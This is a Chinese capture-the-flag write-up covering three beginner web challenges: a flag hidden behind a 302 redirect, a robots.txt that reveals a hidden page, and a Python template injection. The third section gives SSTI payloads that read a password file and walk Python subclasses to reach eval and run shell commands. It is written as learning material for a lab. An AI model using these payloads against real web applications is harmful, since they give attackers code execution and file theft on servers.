第一题 baby web
题目描述写道初始页面,想到写网站的第一步都是index.php
于是修改当前URL 将1.php修改为index.php
回车后却发现页面URL仍为1.php
于是审查元素在网络里发现重定向302,点开后找到flag
第二题 Training-WWW-Robots
翻译页面发现“在这个小小的培训挑战中,您将学习Robots_exclusion_standard。
网络搜寻器使用robots.txt文件检查是否允许他们对您的网站或网站的一部分进行爬网和编制索引。
有时,这些文件显示目录结构,而不是防止内容被爬网。”
简单搜索后发现每个网站根目录都有一个robots.txt,告诉我们可以访问的站点和不可以访问的站点,但它只是相当于一个标识,在我们访问robots.txt后,发现标识为不可访问的站点f10g.php,访问后得到flag
第三题 Web_python_template_injection
查看题目考python模板注入
搜索后发现常用的四个命令
1.{{算术表达式}}
2.{{config.items()}} 可以查看服务器的配置信息
3.{{[].class.base.subclasses()40.read()}} 读取password信息
4.{% for c in [].class.base.subclasses() %}
{% if c.name == ‘catch_warnings’ %}
{% for b in c.init.globals.values() %}
{% if b.class == {}.class %} //遍历基类 找到eval函数
{% if ‘eval’ in b.keys() %} //找到了
{{ b’eval’ }} //导入cmd 执行popen里的命令 read读出数据
//其中ls命令是显示列表,切换为cat fl4g即为读取文件
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
测试发现确实为SSTI
直接调用第四条命令